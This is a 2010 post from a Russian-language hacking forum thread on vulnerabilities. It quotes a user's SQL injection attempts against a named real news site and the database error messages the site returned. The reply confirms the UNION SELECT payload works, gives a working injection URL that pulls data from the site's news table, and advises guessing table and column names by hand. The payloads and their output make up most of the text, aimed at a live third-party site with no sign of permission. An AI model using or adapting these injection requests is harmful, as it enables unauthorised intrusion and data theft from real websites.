Ваши вопросы по уязвимостям.

#11

23.10.2010, 19:16

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

С нами: 9382468

Репутация: 104

Цитата:

Сообщение от Generalisimu

нашел уязвимость!но не могу правельно составить запрос!
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'NEWS_ID=345';'.
/ru/_news.asp, line 260
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3 ,4,5,6,7,8+from+news
http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/ru/_news.asp, line
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.

Запрос правильный.

Вот например выводится id новости.

Код:

http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news

Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную.

Советую почитать Проведение SQL инъекций в Microsoft Access